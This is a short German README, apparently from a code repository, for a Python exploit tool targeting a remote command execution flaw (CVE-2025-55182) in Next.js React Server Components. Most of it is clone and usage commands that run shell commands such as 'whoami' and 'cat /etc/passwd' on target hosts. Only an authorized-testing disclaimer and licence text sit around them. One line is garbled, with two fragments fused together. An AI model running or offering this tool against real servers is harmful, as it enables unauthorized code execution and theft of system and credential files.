
Ein Exploitationstool für die Next.js-Sicherheitslücke CVE-2025-55182, die eine Remote-Befehlsausführung durch ein Prototyp-Poisoning in React Server Components ermöglicht.
Python-Exploit für die RCE-Schwachstelle in Next.js React Server Components mit HTTP/HTTPS-Unterstützung.
# Klonen & ausführen
git clone https://github.com/BrianLopezM99/react2shell-CVE-2025-55182.git
cd react2shell-CVE-2025-55182
python3 exploit_react2shell.py <URL> "<Befehl>"
# HTTP
python3 exploit_react2shell.py http://target.com:3000 "id"
python3 exploit_react2shell.py 192.168.1.100:8080 "ls -la"
# HTTPS
python3 exploit_react2shell.py https://target.com "whoami"
python3 exploit_react2shell.py https://target.com:8443 "cat /etc/passwd"
Nur für autorisierte Sicherheitstests.
Verwenden Sie den Exploit ausschließlich auf Systemen, die Ihnen gehören oder für die Sie ausdrücklich die Erlaubnis zum Testen haben. Verwenden Sie ihn niemals für illegale Aktivitäten.
child_process.execSync() ausMIT-Lizenz – siehe LICENSE-Datei
Haftungsausschluss: Nur zu Bildungszwecken. Holen Sie stets die entsprechende Genehmigung ein.
Zuletzt aktualisiert: 8. Februar 2025
Version: 2.0.0
Betreuer: BrianLopezM99